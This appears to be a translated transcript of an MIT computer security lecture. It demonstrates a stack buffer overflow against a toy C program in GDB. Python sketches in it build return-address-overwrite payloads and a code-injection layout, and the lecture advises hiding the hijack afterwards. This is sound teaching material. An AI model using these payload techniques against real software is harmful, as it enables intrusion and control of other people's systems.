MIT course "Computer Systems Security". Lecture 1: "Introduction: threat models", part 3
Massachusetts Institute of Technology. Course 6.858, "Computer Systems Security". Nickolai Zeldovich, James Mickens. 2014.
Computer Systems Security is a course on the development and implementation of secure computer systems. Lectures cover threat models, attacks that compromise security, and security methods based on the latest scientific work. Topics include operating system (OS) security, capabilities, information flow control, language security, network protocols, hardware protection and security in web applications.
Let's run this program under a debugger. You will get to know the debugger in detail in the first lab. For now, we will set a breakpoint in the read_req function, run the program, and see what happens.
So, I started the program, it began executing main, and it gets to read_req pretty quickly. Now the debugger is stopped at the beginning of read_req. We can look at what is going on here; for example, we can ask it to show the current CPU registers. We are going to look at a lower level than the C source code: at the instructions my machine actually executes, to see what is really going on. C can hide things from us, so we ask the debugger to show all the registers.
On 32-bit x86, as you may remember, there is a frame pointer, the EBP register (the stack-frame base pointer). And my program, not surprisingly, also has a stack.
On x86 the stack grows down, as shown on the slide, and we can keep pushing data onto it. Right now the stack pointer (the ESP register, which holds the address of the top of the stack) points to the memory location ffffd010. There is some value there. How did it get there? One way to find out is to disassemble the code of the read_req function.
GDB complains that a convenience variable must have an integer value, so we disassemble the function by name instead. Here you can see what this function does. First it does some things with the EBP register, which is not very interesting. But then it subtracts a certain value from the stack pointer. This makes room for all the local variables, such as the buffer and the integer that we saw in the C source code. Now we want to understand how this function's stack is laid out. The stack pointer value we saw earlier is already in the middle of the stack; above it are the buffer, the integer, and also the return address into main, which is stored on the stack. So somewhere up here there must be a return address. For now we are just trying to figure out where the different things are on the stack.
We can ask the debugger to print the address of the buffer variable.
Its address is ffffd02c. Now let's print the address of the integer i: it is ffffd0ac. So the integer sits above the buffer on the stack.
That is, our buffer is at this place on the stack, the integer is above it, then possibly some other things, and at the very end is the return address into main, the function that called read_req.
We say the stack grows down because the things above are at higher addresses. Inside the buffer the elements are laid out with [0] at the bottom and the indices increasing upward to [127], the last of the 128 elements, as I drew on the board.
Let's see what happens if we enter the same input that crashed the program. But first we need to determine exactly where our return address is and how it relates to the EBP register.
On x86 there is a handy calling convention: the EBP register points at a slot in the current stack frame that holds the saved EBP, the value EBP had in the caller. This is a separate slot located after all the local variables but before the return address, as shown in this figure.
It is saved by the first few instructions at the top of the function. Let's examine the saved EBP.
In GDB (the GNU Debugger) you can examine memory with the x command, for example at the address held in EBP.
Its position on the stack is ffffd0b8. Indeed, that is higher than our variable i. Perfect.
It holds some other value, the one EBP had before the function was called, and just above it is another memory location, which holds the return address. If we examine ebp + 4, we see that the stack contains 0x08048E5F there. Let's see what that points to.
This is what you will have to do in the lab. You can take this address and try to disassemble it. What is there, and where does it belong? GDB really helps figure out which function contains this address.
So what is at ...5f? This is what the return address points to. As you can see, this instruction immediately follows the call to <read_req>. So when we return from read_req, this is where we go and continue executing main.
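The addresses read off the debugger so far are enough to work out where each slot of the frame sits relative to the buffer. The sketch below, written in Python so it can run anywhere, only does that arithmetic; the constant and function names are made up for illustration.

```python
# Addresses printed by the debugger in this session (32-bit x86).
BUF_ADDR = 0xFFFFD02C        # address of the buffer
I_ADDR = 0xFFFFD0AC          # address of the integer i
EBP = 0xFFFFD0B8             # frame pointer; the saved EBP is stored at this address
RET_ADDR_SLOT = EBP + 4      # the return address sits one 4-byte word above it


def offsets_from_buffer():
    """Return each slot's distance in bytes from the start of the buffer."""
    return {
        "i": I_ADDR - BUF_ADDR,
        "saved_ebp": EBP - BUF_ADDR,
        "return_address": RET_ADDR_SLOT - BUF_ADDR,
    }


if __name__ == "__main__":
    for name, offset in offsets_from_buffer().items():
        print(f"{name:15s} buffer + {offset}")
```

This places i at buffer + 128, the saved EBP at buffer + 140, and the return address at buffer + 144. What occupies the 8 bytes between i and the saved EBP is not stated in the lecture.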
So where are we now? To find out, we can disassemble at our instruction pointer. Type “disass $eip”.
We are at the very beginning of read_req. Let's run up to the gets() call by typing “next”. Then we type the huge input that crashed the program, AAA..., and see what happens.
So gets() has run, but the program is still working. Now let's find out what is in memory at this point and why things will go wrong afterwards.
What do you think is happening now? I typed a sequence of A characters. What did gets() do to memory? It placed this sequence into the buffer on the stack, which, if you remember, holds elements [0] through [127]. The A's filled it from the bottom up, in the direction of the arrow I drew.
But we passed only a single pointer, the address where the buffer begins, so gets() knows where to start writing A's. It does not know the length of the buffer, so it just keeps writing our data into memory, moving up the stack, possibly overwriting the return address and everything else above the buffer. I count the A's I typed and get 180, which exceeds our 128.
This is not so good. We can check again what is stored at EBP; for this I type “x $ebp”. We get the value 41414141, and 0x41 is the ASCII code for “A”.
Great. Then I ask for the location of the return address, $ebp + 4, and get the same value, 41414141.
This is not good at all. It shows what will happen when the program returns from read_req: it will jump to address 41414141. And there is nothing there! So it will crash. That is, we get a segmentation fault.
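What the debugger shows can be reproduced with a small simulation. The sketch below models the stack from the start of the buffer upward as a byte array; the offsets 140 and 144 follow from the addresses seen in the debugger (0xffffd0b8 - 0xffffd02c = 140, plus 4 for the return address). The initial saved-EBP value and all function names are assumptions for illustration, not something shown in the lecture.

```python
import struct

STACK_BYTES = 256                     # modeled memory starting at the buffer (assumed size)
SAVED_EBP_OFF = 140                   # 0xffffd0b8 - 0xffffd02c
RET_OFF = 144                         # (ebp + 4) - address of the buffer
ORIGINAL_RET = 0x08048E5F             # return address seen in the debugger
HYPOTHETICAL_SAVED_EBP = 0xFFFFD0D8   # made-up value; the lecture does not show it


def fresh_stack():
    """Model the stack from buf[0] upward with saved EBP and return address in place."""
    stack = bytearray(STACK_BYTES)
    struct.pack_into("<I", stack, SAVED_EBP_OFF, HYPOTHETICAL_SAVED_EBP)
    struct.pack_into("<I", stack, RET_OFF, ORIGINAL_RET)
    return stack


def unbounded_read(stack, line):
    """Mimic an unbounded read: copy the line plus a NUL to buf[0], ignoring the 128 limit."""
    data = line + b"\x00"
    if len(data) > len(stack):
        raise ValueError("input larger than the modeled memory")
    stack[0:len(data)] = data


def word_at(stack, offset):
    """Read a little-endian 32-bit word, the way x86 stores it."""
    return struct.unpack_from("<I", stack, offset)[0]


if __name__ == "__main__":
    stack = fresh_stack()
    unbounded_read(stack, b"A" * 180)
    print(hex(word_at(stack, SAVED_EBP_OFF)), hex(word_at(stack, RET_OFF)))
```

With 100 A's the return address survives; with 180 both the saved EBP and the return address read back as 0x41414141.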
So let's just step forward and see what happens. Type “next” and let the program run on.
Now we are approaching the end of the function and can step over two more instructions. Type nexti again.
You can see that at the end of the function there is a “leave” instruction, which restores the stack to where it was. It uses EBP to move the stack pointer all the way back up, which pops the saved EBP and leaves the stack pointer at the return address. So now the stack pointer points at the return address we are going to use. In fact, it is all our A characters. If we run one more instruction, the processor will jump to this address, 41414141, try to execute code there, and crash, because it is not a valid address in the page table.
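The effect of the function epilogue can be traced by hand with a tiny register model. This is only a sketch: it models the standard x86 meaning of leave (copy EBP into ESP, then pop EBP) and ret (pop EIP), uses the ESP and EBP values seen earlier in the session, and uses a dictionary as a stand-in for memory. The helper names are hypothetical.

```python
def leave(regs, mem):
    """x86 'leave': mov %ebp, %esp followed by pop %ebp."""
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem[regs["esp"]]
    regs["esp"] += 4


def ret(regs, mem):
    """x86 'ret': pop the word at the top of the stack into EIP."""
    regs["eip"] = mem[regs["esp"]]
    regs["esp"] += 4


def run_epilogue():
    # ESP and EBP as seen in the debugger; EIP is left as a placeholder.
    regs = {"esp": 0xFFFFD010, "ebp": 0xFFFFD0B8, "eip": None}
    # Memory after the overflow: both slots hold the bytes "AAAA".
    mem = {0xFFFFD0B8: 0x41414141, 0xFFFFD0BC: 0x41414141}
    leave(regs, mem)
    esp_after_leave = regs["esp"]
    ret(regs, mem)
    return esp_after_leave, regs


if __name__ == "__main__":
    esp_after_leave, regs = run_epilogue()
    print(hex(esp_after_leave), {name: hex(value) for name, value in regs.items()})
```

After leave the stack pointer is 0xffffd0bc, the return-address slot, and after ret both EBP and EIP hold 0x41414141.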
Let's check what is in memory. Once again we print the contents of our buffer, and it appears to hold exactly 128 A characters.
But remember, we put 180 A's into the buffer. So something else happened after the overflow. If you remember, the program converted the string of A's to the integer i. Since we have only the letter A and no digits, the conversion produces 0, and that 0 is written into the memory location of i, which sits right after the buffer. And a zero byte, as you know, marks the end of a string in C. So GDB thinks we have a nice, complete string of 128 A's.
But that doesn't really matter, because all the other A's are still there further up, and they have already corrupted the stack.
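The truncated string can be reproduced in a few lines. The sketch assumes the conversion behaves like C's atoi, which yields 0 for a string with no leading digits, and that i occupies the four bytes right after the buffer (0xffffd0ac - 0xffffd02c = 128). The function names are made up for illustration.

```python
import struct

I_OFF = 128     # i sits right after the 128-byte buffer
RET_OFF = 144   # return-address slot, relative to buf[0]


def c_string_at(memory, start=0):
    """Return the bytes a C string reader would see: everything up to the first NUL."""
    end = memory.index(0, start)
    return bytes(memory[start:end])


def simulate():
    stack = bytearray(256)
    stack[0:180] = b"A" * 180                  # what the unbounded read left; byte 180 is NUL
    before = len(c_string_at(stack))
    struct.pack_into("<i", stack, I_OFF, 0)    # i = 0, assuming atoi-like conversion of "AAA..."
    after = len(c_string_at(stack))
    ret_bytes = bytes(stack[RET_OFF:RET_OFF + 4])
    return before, after, ret_bytes


if __name__ == "__main__":
    print(simulate())
```

The string is 180 bytes long before the store to i and 128 afterwards, while the return-address slot still holds four A's.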
Actually, there is an important lesson here. You have to keep in mind that other code will run after you have managed to overflow the buffer and corrupt memory. You must make sure that this code does not do anything silly from your point of view. For example, if the conversion of the A's into the integer i exited the program as soon as it saw a non-numeric character, we would never get to jump to address 41414141. So in some cases you have to shape your input carefully. It does not matter much here, but in other situations you need to be careful about what kind of data, numeric or alphabetic, you feed the program.
Now let's step again and see what happens next. Look at our registers. Right now EIP, the instruction pointer, points to the last instruction of read_req, <read_req+44>. If we take one more step, we finally arrive at our unfortunate 41414141.
Indeed, the program jumps where we told it to, and if we ask GDB to print the current registers, the instruction pointer holds this strange value. Let's execute one more instruction, and finally the program crashes.
This happened because the program tried to follow an instruction pointer that does not correspond to a valid page for this process in the operating system's page table. Is that clear?
Great, now I have a question for you. So what is the problem here, after all?
Audience: You can make this program do whatever you want!
That's right! Admittedly, it was rather silly to enter such a huge number of A's. But if you knew exactly where to put your values, you could put other values there and make the program jump to some other address. Let's see if we can do this.
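Knowing where to put the values comes down to knowing the distance from the start of the buffer to the return-address slot, which is 144 bytes in this session ((0xffffd0b8 + 4) - 0xffffd02c). A minimal sketch of building such an input follows; the function name is hypothetical, and the target used in the example is simply the original return address standing in for wherever one would want to go.

```python
import struct

RET_OFFSET = 144           # distance from buf[0] to the return address in this session
EXAMPLE_TARGET = 0x08048E5F  # stand-in target: the original return address


def build_payload(target, ret_offset=RET_OFFSET):
    """Filler up to the return-address slot, then the target as a little-endian word."""
    payload = b"A" * ret_offset + struct.pack("<I", target)
    if b"\n" in payload:
        # A line-oriented read such as gets() stops at a newline byte.
        raise ValueError("payload contains a newline byte and would be cut short")
    return payload


if __name__ == "__main__":
    print(build_payload(EXAMPLE_TARGET)[-4:].hex())
```

The address is packed little-endian because that is how x86 stores words in memory. The filler also overwrites i and the saved EBP on the way up, so code that runs later and depends on them may misbehave.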
Let's stop the program, restart it, and again enter a lot of A characters to overflow the buffer. I am not going to work out which A ends up where on the stack. Instead, suppose I overflow the stack at this point and then manually change things on the stack so that the function jumps where I want. So I type nexti again.
Where are we? We are again at the very end of read_req. Let's take a look at our stack.
If we examine ESP, we see our corrupted pointer. Good. Where could we jump from here? What interesting thing could we do? Unfortunately, this program is very limited. There is almost nothing in its code that we could jump to in order to do something interesting, but we will try anyway. Perhaps we can find the printf call, jump there, and make it print some value for x. We can disassemble the main function: disass main.
The main function does a whole bunch of things: some setup, the call to read_req, a few more things, and then the call to printf. So how about jumping to this point, <+26>, which sets up the argument for printf from the value that was in %eax at <+22>? We can take the address of the instruction at <+26> and patch it into this stack slot. This is fairly easy to do with the debugger: with set {int}$esp you can set the word at ESP to this value.
You can check ESP again, and indeed, it holds that value.
We continue with the “c” command and see that the program printed x equal to some garbage. I think that is because of whatever was on the stack where printf looked for its arguments. We did not set up all the arguments properly, because we jumped into the middle of the calling sequence (the sequence of instructions and data needed to call the function).
Yes, it printed this value, and after that the program crashed. Why did that happen? We jumped to the printf call, and then something went wrong. We changed the return address, so when we returned from read_req we went to this new address, the point in main that leads into printf. So where did the crash come from?
Audience: From main returning!
That's right! Here is what happens: this is the point we jumped to, <+26>. It sets up some arguments and calls printf. printf runs and is ready to return. So far so good, because the call instruction pushes a return address onto the stack for printf to use.
The main function continues, runs the leave instruction, which is nothing interesting, and then executes another ret at <+39>. But there is no proper return address on the stack at that point. So presumably we return to who knows what location, taken from memory further up the stack, and jump somewhere else. So, unfortunately, our pseudo-attack does not quite work here. Some other code runs, and then it crashes. This is probably not what we wanted.
So if you really want to be careful, you must not only place the return address on the stack carefully, but also figure out where the second ret will get its return address from. Then you need to carefully put something else on the stack to make sure the program continues to run cleanly after it has been hijacked, so that nobody notices the intrusion.
This is what you will try to do in lab 1, only in more detail.
There is one more thing we should think about now: the stack layout and how it affects buffer overflows. In this case our problem is that the return address is located up above the buffer, right? The buffer overflows upward and eventually runs over the return address. But what if we turned the stack upside down? You know, some machines have stacks that grow up. So we could imagine an alternative design where the stack starts at the bottom and grows up instead of down. Then if you overflow such a buffer, you just keep going up the stack, and perhaps nothing bad happens.
Let me draw it to explain how it looks. Let the return address be here, at the bottom of the stack. Above it is the saved EBP, then the integer variable, and at the very top is the buffer, from [0] to [127]. If we overflow it, the data goes up, along this arrow.
So a buffer overflow will not affect this return address. But what does our program do next? Right, read_req makes a function call! That call puts a new stack frame on top: above the buffer comes the callee's return address, then its saved EBP, and then all its other variables on top of that. And then gets(buf) starts overflowing the buffer.
So this design is still problematic, basically because the buffer is surrounded by return addresses on all sides, and either way you can overwrite one of them. Suppose our machine has a stack that grows up. At what point can you take control of the program?
In fact, in some cases it is even easier. You do not need to wait for read_req to return, and you do not have to worry about things like the conversion of the A's into i. It is easier because gets(buf) itself overflows the buffer: it overwrites its own return address, and then it returns right away and jumps to wherever you set things up.
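The upward-growing case can be simulated in the same style. The layout below is an assumption made for illustration: it follows the drawing described above (return address, saved EBP, integer, buffer, from low to high addresses) and then places only the return address of the called input routine directly above the buffer, ignoring the argument that a real call would also push. The callee's return-address value is made up.

```python
import struct

# Assumed layout for a stack that grows toward higher addresses (byte offsets).
CALLER_RET_OFF = 0               # return address of the function that owns the buffer
SAVED_EBP_OFF = 4
I_OFF = 8
BUF_OFF = 12                     # buf[0..127]
CALLEE_RET_OFF = BUF_OFF + 128   # return address of the input routine it calls
STACK_BYTES = 256

CALLER_RET = 0x08048E5F               # value seen in the debugger session
HYPOTHETICAL_CALLEE_RET = 0x08048E30  # made-up address


def fresh_upward_stack():
    """Build the modeled stack with both return addresses in place."""
    stack = bytearray(STACK_BYTES)
    struct.pack_into("<I", stack, CALLER_RET_OFF, CALLER_RET)
    struct.pack_into("<I", stack, CALLEE_RET_OFF, HYPOTHETICAL_CALLEE_RET)
    return stack


def unbounded_read(stack, line):
    """Copy the line plus a NUL into the buffer without checking its size."""
    data = line + b"\x00"
    if BUF_OFF + len(data) > len(stack):
        raise ValueError("input larger than the modeled memory")
    stack[BUF_OFF:BUF_OFF + len(data)] = data


def word_at(stack, offset):
    """Read a little-endian 32-bit word."""
    return struct.unpack_from("<I", stack, offset)[0]


if __name__ == "__main__":
    stack = fresh_upward_stack()
    unbounded_read(stack, b"A" * 132)
    print(hex(word_at(stack, CALLER_RET_OFF)), hex(word_at(stack, CALLEE_RET_OFF)))
```

Here 132 bytes are enough: the caller's return address below the buffer is untouched, but the callee's own return address becomes 0x41414141, so control is lost as soon as the input routine returns.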
What can you do with such a rather boring program? It does not seem to contain any interesting code to jump to. All you can do is make it print a different value of x here, in printf.
Let's try!
Audience: If you have an executable stack, can you put arbitrary code there that, for example, executes a shell?
Yes, that is really clever, because then you can supply your own code as input. There are some defenses against this, and you will learn about them in the next lectures. But in principle you can overwrite the return address here on both kinds of machines, with stacks growing up and with stacks growing down. And instead of pointing it at existing code, such as the printf call in main, we could point the return address into the buffer, since that is just some location in memory. You can jump there and treat its contents as executable code.
As part of your request you send some bytes of data to the server, then set the return address to the location in the buffer where you placed them, and the program continues executing from that point.
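The shape of such an input can be sketched as follows, using the buffer address from the debugger session (ffffd02c) and the 144-byte distance to the return-address slot ((0xffffd0b8 + 4) - 0xffffd02c). The function name is hypothetical and the code bytes are only x86 NOP placeholders, not a working program. The sketch also assumes the stack address is the same on every run and that the stack is executable, which the defenses mentioned above are meant to prevent.

```python
import struct

BUF_ADDR = 0xFFFFD02C   # address of the buffer in this debugger session
BUF_SIZE = 128
RET_OFFSET = 144        # distance from buf[0] to the return-address slot

PLACEHOLDER_CODE = b"\x90" * 16   # x86 NOPs standing in for real instructions


def build_injection_payload(code, buf_addr=BUF_ADDR):
    """Place code at buf[0], pad up to the return address, then point it at the buffer."""
    if len(code) > BUF_SIZE:
        # Bytes past the buffer land on i, which the program overwrites later.
        raise ValueError("code must fit inside the 128-byte buffer")
    payload = code + b"A" * (RET_OFFSET - len(code)) + struct.pack("<I", buf_addr)
    if b"\n" in payload:
        # A line-oriented read such as gets() stops at a newline byte.
        raise ValueError("payload contains a newline byte and would be cut short")
    return payload


if __name__ == "__main__":
    payload = build_injection_payload(PLACEHOLDER_CODE)
    print(len(payload), payload[-4:].hex())
```

The last four bytes are the buffer address in little-endian order, so the function's return lands on the first byte of the data that was sent.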